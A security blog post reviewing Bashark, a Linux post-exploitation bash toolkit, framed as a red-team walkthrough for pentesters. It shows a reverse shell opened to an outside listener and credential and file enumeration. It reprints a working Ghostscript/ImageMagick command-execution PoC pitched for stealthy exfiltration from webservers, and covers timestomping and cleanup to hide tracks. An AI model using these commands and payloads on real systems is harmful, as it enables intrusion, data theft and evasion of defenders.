Toolsmith Snapshot: Bashark - Linux post-exploitation toolkit

 Posted on September 2, 2018  |  5 minutes  |  Russ McRee

“Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.”

/post/bashark/Bashark-thumb.JPG

Bashark is a convenient bash script, easy to use after you’ve gained access to a Linux target with either user or root permissions. Created by TheSecondSun (Wintermute) and available in his GitHub repository, the feature list follows:

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

On your victim system, from a prompt you can wget Bashark to get started.

curl https://raw.githubusercontent.com/TheSecondSun/Bashark/master/bashark.sh > bashark.sh

Running Bashark is as easy as sourcing the bashark.sh script from terminal:

$ source bashark.sh

Then type help to see Bashark’s menu. Results seen in Figure 1.

/post/bashark/menu-thumb.JPG
Figure 1: Bashark menu

I’ll walk you through some post-expoitation scenarios with Bashark, we’ll assume that we have acquired user level permissions on our victim system initially. It’s always good to assess your operating environment as you begin. Determine if your running on bare metal or a virtual machine with isvm.

bashark_1.0$ isvm
[*] Host is running on a Virtual Machine

We can determine further host information with i.

/post/bashark/target-thumb.JPG
Figure 2: Target information

Clearly we don’t have root access, so what steps might we take to elevate privilege? First, I’m always a fan of establishing reverse shell access. Bashark enables this easily with revshell. I ran

revshell 192.168.248.31 31337

and connected to my Ncat listener on my lab C2 box as seen in Figure 3:.

/post/bashark/revshell-thumb.JPG
Figure 3: Reverse shell established

You could search for sensitive files that may include credentials or mission critical data with the likes of fnd (recursive search for strings) and/or fndre for some rudimentary regular expressions (my experiments with the findre function failed no matter how precise the test data). There are plenty of other enumeration options as well, including getconf (enumerate config files), getperm (files and folders with special perms, see getperm –help), fileinfo (inspect a file), and usrs (shows all users on the host). Your best option might be to explore what apps are installed with getapp and determine if there are there vulnerable apps present.

/post/bashark/getapp-thumb.JPG
Figure 4: getapp results

As an example, you likely took recent note of the Ghostscript issues (re)discovered by Google’s Tavis Ormandy. Versions up to and including 9.22 are vulnerable, a quick gs -v on my victim showed 9.22 present.
Tavis’s write-up on these bugs includes some minimalist PoCs with some interesting ideas for banditry. As a redteamer I like the applicability of stealing arbitrary files from webservers that use ImageMagick by encoding file contents into image output. If your victim target is a webserver this makes for interesting exfil opportunities when placing your output image files in the world-readable /images directory of the httpd hierarchy. This is a bit more stealthy than straight up pilfering via your earlier established reverse shell or the like. :-) Want to dump out results from the lshw command (displays information on hardware configuration of the system)? Try the following, which on most Ubuntu systems, should allow you to convert script content saved as JPEG to a to an image that displays the resulting content. On an Ubuntu system you can try Tavis’s POC. Save the following script as a JPEG. Example: lshw.jpeg

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%lshw) currentdevice putdeviceprops

Then run the following.

convert lshw.jpeg lshw.gif

If all goes well, your script should be processed by Ghostscript and present results content in the convert output. Now that you’ve implemented your evil plan, you may want to clean up your tracks before you pop smoke and vacate the premises. That lshw.jpeg and lshw.gif you created? All good red teamers timestomp to confound their blue team friends in their effort to log2timeline their adversarial amigos. Consider how easy Bashark makes it in Figure 5.

/post/bashark/timestomp-thumb.JPG
Figure 5: timestomp in action

The cleanup routine also is enabled by default, thus when you quit it should do as promised and clean up behind you. As an example, if you created files or directories while operating in Bashark context with t (create a file) or mkd (create a directory), the quit routine will obey the cleanup directive upon execution, as seen in Figure 6.

/post/bashark/cleanup-thumb.JPG
Figure 6: I better clean up before I go

The only bug here is that the Bashark-sourced shell doesn’t actually quit, so through down an exit to bail out entirely. To that end, Bashark is a bit buggy, but hey, it’s the first rev of a nice effort, so help TheSecondSun out and submit bugs (I dropped one in the queue), or fork the code and tune it. There are endless options to add as Bashark functions so consider spinning a fork and expanding on the theme as well. Hope you have fun with this one, it’s definitely a great starting point for *nix post-expoitation fun. Enjoy!

Cheers…until next time.

Linux  post-exploitation 
comments powered by Disqus